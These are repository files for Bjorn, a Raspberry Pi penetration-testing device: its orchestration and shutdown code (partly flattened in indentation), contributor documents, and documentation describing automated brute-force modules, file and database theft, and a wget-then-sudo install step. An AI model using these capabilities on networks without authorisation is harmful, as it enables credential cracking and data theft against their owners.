self._last_orch_stop_attempt = 0.0
    def run(self):
        """Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
        if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
            logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
            time.sleep(self.shared_data.startup_delay)
        backoff_s = 1.0
        while not self.shared_data.should_exit:
            try:
                # Manual/Bifrost/Loki modes must stop orchestration.
                # BIFROST: Wi-Fi is in monitor mode, so no network is available for scans.
                current_mode = self.shared_data.operation_mode
                if current_mode in ("MANUAL", "BIFROST", "LOKI"):
                    # Avoid spamming stop requests if already stopped.
                    if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
                        self.stop_orchestrator()
                else:
                    self.check_and_start_orchestrator()
                time.sleep(5)
                backoff_s = 1.0  # Reset backoff on success
            except Exception as exc:
                logger.error(f"Bjorn main loop error: {exc}")
                logger.error_throttled(
                    "Bjorn main loop entering backoff due to repeated errors",
                    key="bjorn_main_loop_backoff",
                    interval_s=60,
                )
                time.sleep(backoff_s)
                backoff_s = min(backoff_s * 2.0, 30.0)
    def check_and_start_orchestrator(self):
        """Check network connectivity and start the Orchestrator if connected."""
        if self.shared_data.operation_mode in ("MANUAL", "BIFROST", "LOKI"):
            return
        if self.is_network_connected():
            if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
                self.start_orchestrator()
        else:
            logger.info_throttled(
                "Waiting for network connection to start Orchestrator...",
                key="bjorn_wait_network",
                interval_s=30,
            )
    def start_orchestrator(self):
        """Start the orchestrator thread."""
        with self._orch_lock:
            # Re-check network inside the lock
            if not self.network_connected:
                return
            if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
                logger.debug("Orchestrator thread is already running.")
                return
            logger.info("Starting Orchestrator thread...")
            self.shared_data.orchestrator_should_exit = False
            self.orchestrator = Orchestrator()
            self.orchestrator_thread = threading.Thread(
                target=self.orchestrator.run,
                daemon=True,
                name="OrchestratorMain",
            )
            self.orchestrator_thread.start()
            logger.info("Orchestrator thread started.")
    def stop_orchestrator(self):
        """Stop the orchestrator thread."""
        with self._orch_lock:
            thread = self.orchestrator_thread
            if thread is None or not thread.is_alive():
                self.orchestrator_thread = None
                self.orchestrator = None
                return
            # Keep MANUAL sticky so the supervisor does not auto-restart orchestration,
            # but only if the current mode isn't already handling it.
            # - MANUAL/BIFROST: already non-AUTO, no need to change
            # - AUTO: leave it alone; the orchestrator will restart naturally (e.g. after Bifrost auto-disable)
            try:
                current = self.shared_data.operation_mode
                if current == "AI":
                    self.shared_data.operation_mode = "MANUAL"
            except Exception:
                pass
            now = time.time()
            if now - self._last_orch_stop_attempt >= 10.0:
                logger.info("Stop requested: stopping Orchestrator")
                self._last_orch_stop_attempt = now
            self.shared_data.orchestrator_should_exit = True
            self.shared_data.queue_event.set()  # Wake up the orchestrator thread
            thread.join(timeout=10.0)
            if thread.is_alive():
                logger.warning_throttled(
                    "Orchestrator thread did not stop gracefully",
                    key="orch_stop_not_graceful",
                    interval_s=20,
                )
                # Still reset status so the UI doesn't stay stuck on the
                # last action while the thread finishes in the background.
            else:
                self.orchestrator_thread = None
                self.orchestrator = None
            # Always reset display state regardless of whether join succeeded.
            self.shared_data.bjorn_orch_status = "IDLE"
            self.shared_data.bjorn_status_text = "IDLE"
            self.shared_data.bjorn_status_text2 = ""
            self.shared_data.action_target_ip = ""
            self.shared_data.active_action = None
            self.shared_data.update_status("IDLE", "")
def is_network_connected(self):
"""Checks for network connectivity with throttling and low-CPU checks."""
now = time.time()
# Throttling: Do not scan more than once every 10 seconds
if now - self._last_net_check < 10:
return self.network_connected
self._last_net_check = now
def interface_has_ip(interface_name):
try:
# OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
if not os.path.exists(f"/sys/class/net/{interface_name}"):
return False
# Check for IP address
result = subprocess.run(
["ip", "-4", "addr", "show", interface_name],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
timeout=2,
)
if result.returncode != 0:
return False
return "inet " in result.stdout
except Exception:
return False
eth_connected = interface_has_ip("eth0")
wifi_connected = interface_has_ip("wlan0")
self.network_connected = eth_connected or wifi_connected
if self.network_connected != self.previous_network_connected:
if self.network_connected:
logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
else:
logger.warning("Network status changed: Connection lost")
self.previous_network_connected = self.network_connected
return self.network_connected
    @staticmethod
    def start_display(old_display=None):
        """Start the display thread, stopping any previous Display first."""
        # Ensure the previous Display's controller is fully stopped to release frames
        if old_display is not None:
            try:
                old_display.display_controller.stop(timeout=3.0)
            except Exception:
                pass
        display = Display(shared_data)
        display_thread = threading.Thread(
            target=display.run,
            daemon=True,
            name="DisplayMain",
        )
        display_thread.start()
        return display_thread, display
def _request_shutdown():
    """Signal all threads to stop."""
    shared_data.should_exit = True
    shared_data.orchestrator_should_exit = True
    shared_data.display_should_exit = True
    shared_data.webapp_should_exit = True
    shared_data.queue_event.set()
def handle_exit(
sig,
frame,
display_thread,
bjorn_thread,
web_thread_obj,
health_thread=None,
runtime_state_thread=None,
from_signal=False,
):
global _shutdown_started
with _shutdown_lock:
if _shutdown_started:
if from_signal:
logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
os._exit(130)
return
_shutdown_started = True
logger.info(f"Shutdown signal received: {sig}")
_request_shutdown()
# 1. Stop Display (handles EPD cleanup)
try:
handle_exit_display(sig, frame, display_thread)
except Exception:
pass
# 2. Stop Health Monitor
try:
if health_thread and hasattr(health_thread, "stop"):
health_thread.stop()
except Exception:
pass
# 2b. Stop Runtime State Updater
try:
if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
runtime_state_thread.stop()
except Exception:
pass
# 2c. Stop Sentinel Watchdog
try:
engine = getattr(shared_data, 'sentinel_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 2d. Stop Bifrost Engine
try:
engine = getattr(shared_data, 'bifrost_engine', None)
if engine and hasattr(engine, 'stop'):
engine.stop()
except Exception:
pass
# 3. Stop Web Server
try:
if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
web_thread_obj.shutdown()
except Exception:
pass
# 4. Join all threads
for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
try:
if thread and thread.is_alive():
thread.join(timeout=5.0)
except Exception:
pass
# 5. Close Database (Prevent corruption)
try:
if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
shared_data.db.close()
except Exception as exc:
logger.error(f"Database shutdown error: {exc}")
logger.info("Bjorn stopped. Clean exit.")
_release_instance_lock()
if from_signal:
sys.exit(0)
def _install_thread_excepthook():
def _hook(args):
logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
# We don't force shutdown here to avoid killing the app on minor thread glitches,
# unless it's critical. The Crash Shield will handle restarts.
threading.excepthook = _hook
if __name__ == "__main__":
logger.info("Starting threads")
if not _acquire_instance_lock():
sys.exit(1)
atexit.register(_release_instance_lock)
_install_thread_excepthook()
display_thread = None
display_instance = None
bjorn_thread = None
health_thread = None
runtime_state_thread = None
last_gc_time = time.time()
try:
        logger.info("Bjorn Startup: Loading config...")
        shared_data.load_config()
        logger.info("Starting Runtime State Updater...")
        runtime_state_thread = RuntimeStateUpdater(shared_data)
        runtime_state_thread.start()
        logger.info("Starting Display...")
        shared_data.display_should_exit = False
        display_thread, display_instance = Bjorn.start_display()
        logger.info("Starting Bjorn Core...")
        bjorn = Bjorn(shared_data)
        shared_data.bjorn_instance = bjorn  # Expose the Bjorn instance via shared_data
        bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
        bjorn_thread.start()
        if shared_data.config.get("websrv", False):
            logger.info("Starting Web Server...")
            if not web_thread.is_alive():
                web_thread.start()
        health_interval = int(shared_data.config.get("health_log_interval", 60))
        health_thread = HealthMonitor(shared_data, interval_s=health_interval)
        health_thread.start()
# Sentinel watchdog — start if enabled in config
try:
from sentinel import SentinelEngine
sentinel_engine = SentinelEngine(shared_data)
shared_data.sentinel_engine = sentinel_engine
if shared_data.config.get("sentinel_enabled", False):
sentinel_engine.start()
logger.info("Sentinel watchdog started")
else:
logger.info("Sentinel watchdog loaded (disabled)")
except Exception as e:
logger.warning("Sentinel init skipped: %s", e)
# Bifrost engine — start if enabled in config
try:
from bifrost import BifrostEngine
bifrost_engine = BifrostEngine(shared_data)
shared_data.bifrost_engine = bifrost_engine
if shared_data.config.get("bifrost_enabled", False):
bifrost_engine.start()
logger.info("Bifrost engine started")
else:
logger.info("Bifrost engine loaded (disabled)")
except Exception as e:
logger.warning("Bifrost init skipped: %s", e)
# Loki engine — start if enabled in config
try:
from loki import LokiEngine
loki_engine = LokiEngine(shared_data)
shared_data.loki_engine = loki_engine
if shared_data.config.get("loki_enabled", False):
loki_engine.start()
logger.info("Loki engine started")
else:
logger.info("Loki engine loaded (disabled)")
except Exception as e:
logger.warning("Loki init skipped: %s", e)
# Signal Handlers
exit_handler = lambda s, f: handle_exit(
s,
f,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
True,
)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
# --- SUPERVISOR LOOP (Crash Shield) ---
restart_times = []
max_restarts = 5
restart_window_s = 300
logger.info("Bjorn Supervisor running.")
while not shared_data.should_exit:
time.sleep(2) # CPU Friendly polling
now = time.time()
# --- OPTIMIZATION: Periodic Garbage Collection ---
# Forces cleanup of circular references and free RAM every 2 mins
if now - last_gc_time > 120:
gc.collect()
last_gc_time = now
logger.debug("System: Forced Garbage Collection executed.")
# --- CRASH SHIELD: Bjorn Thread ---
if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Bjorn Main Thread")
bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
bjorn_thread.start()
else:
logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Display Thread ---
if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Display Thread")
display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
else:
logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
_request_shutdown()
break
# --- CRASH SHIELD: Runtime State Updater ---
if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
restart_times.append(now)
if len(restart_times) <= max_restarts:
logger.warning("Crash Shield: Restarting Runtime State Updater")
runtime_state_thread = RuntimeStateUpdater(shared_data)
runtime_state_thread.start()
else:
logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
_request_shutdown()
break
# Exit cleanup
if health_thread:
health_thread.stop()
if runtime_state_thread:
runtime_state_thread.stop()
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except Exception as exc:
logger.critical(f"Critical bootstrap failure: {exc}")
_request_shutdown()
# Try to clean up anyway
try:
handle_exit(
signal.SIGTERM,
None,
display_thread,
bjorn_thread,
web_thread,
health_thread,
runtime_state_thread,
False,
)
except:
pass
sys.exit(1)

# 📝 Code of Conduct
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
   Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
   Use a descriptive branch name for your feature or bugfix:
   ```bash
   git checkout -b feature/your-feature-name
   ```
3. **Make your changes**:
   Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
   Run the test suite to ensure your changes don't break any functionality:
   - ...
5. **Commit your changes**:
   Use meaningful commit messages that explain what you have done:
   ```bash
   git commit -m "Add feature/fix: Description of changes"
   ```
6. **Push your changes**:
   Push your changes to your fork:
   ```bash
   git push origin feature/your-feature-name
   ```
7. **Submit a Pull Request**:
   Create a pull request on the main repository, detailing the changes you've made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve Bjorn!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-current-focus)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring the ongoing actions, displaying results or stats, and interacting with Bjorn.
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
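New actions follow a simple pattern: a module in `actions/` exposing a class the orchestrator can instantiate and run against a host. The skeleton below is a hypothetical sketch; the class attributes and the `execute` signature are illustrative, not the project's actual interface.

```python
# Hypothetical skeleton of a Bjorn action module (names are illustrative).
# Real actions live in actions/ and are registered via actions.json.

class ExampleAction:
    """Probes a target and records whether the attempt succeeded."""

    # Metadata the orchestrator could use for scheduling (illustrative).
    action_name = "example_action"
    port = 80

    def __init__(self, shared_data):
        self.shared_data = shared_data

    def execute(self, ip, row, status_key):
        """Run the action against one host; return 'success' or 'failed'."""
        try:
            # ... do the actual work against `ip` here ...
            return "success"
        except Exception:
            return "failed"
```

Returning a plain status string keeps the orchestrator's bookkeeping (success/failed history in `netkb`) decoupled from what each action actually does.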
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
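A custom success level can be registered with the standard `logging` module. This is a minimal sketch of the idea, not the project's exact implementation; the level number 25 is an assumption, chosen to sit between INFO (20) and WARNING (30).

```python
import logging

SUCCESS_LEVEL = 25  # assumption: between INFO (20) and WARNING (30)
logging.addLevelName(SUCCESS_LEVEL, "SUCCESS")

def success(self, message, *args, **kwargs):
    """Log a message at the custom SUCCESS level."""
    if self.isEnabledFor(SUCCESS_LEVEL):
        self._log(SUCCESS_LEVEL, message, args, **kwargs)

# Attach the helper so every logger gains a .success() method.
logging.Logger.success = success

logger = logging.getLogger("bjorn")
logger.setLevel(SUCCESS_LEVEL)
logger.success("Brute-force completed")
```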
#### orchestrator.py
Bjorn's AI: a heuristic engine that orchestrates the different actions, such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of each action and of Bjorn itself.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status. (Alive or offline)
- Open ports and vulnerabilities.
- Action execution history. (Success or failed)
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
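Because `netkb.csv` is a plain CSV file, it can be inspected with the standard `csv` module. The snippet below is a sketch using made-up sample data; the column names (`IPs`, `Alive`, etc.) are assumptions based on the screenshots above and may not match the real file exactly.

```python
import csv
from io import StringIO

# Illustrative sample; the real netkb.csv columns may differ.
sample = """MAC Address,IPs,Hostnames,Alive,Ports
AA:BB:CC:DD:EE:01,192.168.1.10,server1,1,"22;80"
AA:BB:CC:DD:EE:02,192.168.1.11,printer,0,""
"""

def alive_hosts(csv_text):
    """Return the IPs of rows whose Alive flag is set."""
    reader = csv.DictReader(StringIO(csv_text))
    return [row["IPs"] for row in reader if row["Alive"] == "1"]

print(alive_hosts(sample))  # ['192.168.1.10']
```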
#### Scan Results
Located in `data/output/scan_results/`.
A new file is generated every time the network is scanned; it is used to consolidate the data and update `netkb`.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To manually start Bjorn (outside the service; first make sure the service is stopped with `sudo systemctl stop bjorn.service`):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/* \
/home/bjorn/Bjorn/data/logs/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
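A minimal illustrative excerpt of what such a file might contain (the keys below are those mentioned above; the values are examples only — use the web interface or your generated `shared_config.json` as the reference):

```json
{
  "manual_mode": false,
  "websrv": true,
  "debug_mode": false,
  "epd_type": "epd2in13_V2"
}
```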
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn (generated dynamically from the contents of the `actions/` folder), including:
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
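As an illustration, a single entry might look roughly like this (the exact key names are hypothetical; check the generated `actions.json` on your device for the real schema):

```json
{
  "module": "ssh_bruteforce",
  "class": "SSHBruteforce",
  "port": 22,
  "parent": null,
  "status": "SSHBruteforceStatus"
}
```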
## 📟 E-Paper Display Support
Currently tested and hardcoded for the 2.13-inch V2 & V4 e-Paper HATs.
The program automatically detects the screen model and adapts its Python code accordingly.
For other versions:
- As I don't have the V1 and V3 hardware to validate the detection logic, I can only hope it works properly.
### 🍾 Ghosting Removed!
While getting Bjorn to work with the different screen versions, I experimented with several parameters and discovered that it is possible to eliminate screen ghosting entirely! Have a look at the code — this method should be useful for many other e-Paper projects.
## ✍️ Development Guidelines
### Adding New Actions
1. Create a new action file in `actions/`.
2. Implement required methods:
- `__init__(self, shared_data)`
- `execute(self, ip, port, row, status_key)`
3. Add the action to `actions.json`.
4. Follow existing action patterns.
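As a sketch, a hypothetical action module could look like this (only the two method signatures come from the list above; the class name, banner-grabbing logic, and `"success"`/`"failed"` return values are illustrative assumptions — follow an existing action in `actions/` for the real conventions):

```python
import socket


class PortBannerGrab:
    """Hypothetical example action: grab a service banner from an open port."""

    def __init__(self, shared_data):
        # shared_data exposes configuration and runtime state to every action
        self.shared_data = shared_data
        self.action_name = "PortBannerGrab"

    def execute(self, ip, port, row, status_key):
        # row / status_key are placeholders the orchestrator would use to
        # track netkb state; this sketch only returns an outcome string
        try:
            with socket.create_connection((ip, int(port)), timeout=3) as sock:
                banner = sock.recv(1024).decode(errors="replace").strip()
            return "success" if banner else "failed"
        except OSError:
            return "failed"
```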
### 🧪 Testing
1. Create a test environment.
2. Use an isolated network.
3. Follow ethical guidelines.
4. Document test cases.
## 💻 Web Interface
- **Access**: `http://[device-ip]:8000`
- **Features**:
- Real-time monitoring with a console.
- Configuration management.
- Viewing results. (Credentials and files)
- System control.
## 🧭 Project Roadmap
### 🪛 Current Focus
- Stability improvements.
- Bug fixes.
- Service reliability.
- Documentation updates.
### 🧷 Future Plans
- Additional attack modules.
- Enhanced reporting.
- Improved user interface.
- Extended protocol support.
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.

## 🔧 Installation and Configuration
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Prerequisites](#-prerequisites)
- [Quick Install](#-quick-install)
- [Manual Install](#-manual-install)
- [License](#-license)
Use Raspberry Pi Imager to install your OS
https://www.raspberrypi.com/software/
### 📌 Prerequisites for RPI zero W (32bits)
![image](https://github.com/user-attachments/assets/3980ec5f-a8fc-4848-ab25-4356e0529639)
- Raspberry Pi OS installed.
- Stable:
- System: 32-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-armhf-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
### 📌 Prerequisites for RPI zero W2 (64bits)
![image](https://github.com/user-attachments/assets/e8d276be-4cb2-474d-a74d-b5b6704d22f5)
Bjorn was not developed for the 64-bit Raspberry Pi Zero 2 W, but several users have reported that the installation works perfectly.
- Raspberry Pi OS installed.
- Stable:
- System: 64-bit
- Kernel version: 6.6
- Debian version: 12 (bookworm) '2024-10-22-raspios-bookworm-arm64-lite'
- Username and hostname set to `bjorn`.
- 2.13-inch e-Paper HAT connected to GPIO pins.
At the moment, the V2 and V4 e-Paper screens have been tested and implemented.
I hope the V1 and V3 will work the same.
### ⚡ Quick Install
The fastest way to install Bjorn is using the automatic installation script:
```bash
# Download and run the installer
wget https://raw.githubusercontent.com/infinition/Bjorn/refs/heads/main/install_bjorn.sh
sudo chmod +x install_bjorn.sh
sudo ./install_bjorn.sh
# Choose option 1 for automatic installation. It may take a while, as many packages and modules will be installed. You must reboot at the end.
```
### 🧰 Manual Install
#### Step 1: Activate SPI & I2C
```bash
sudo raspi-config
```
- Navigate to **"Interface Options"**.
- Enable **SPI**.
- Enable **I2C**.
#### Step 2: System Dependencies
```bash
# Update system
sudo apt-get update && sudo apt-get upgrade -y
# Install required packages
sudo apt install -y \
libjpeg-dev \
zlib1g-dev \
libpng-dev \
python3-dev \
libffi-dev \
libssl-dev \
libgpiod-dev \
libi2c-dev \
libatlas-base-dev \
build-essential \
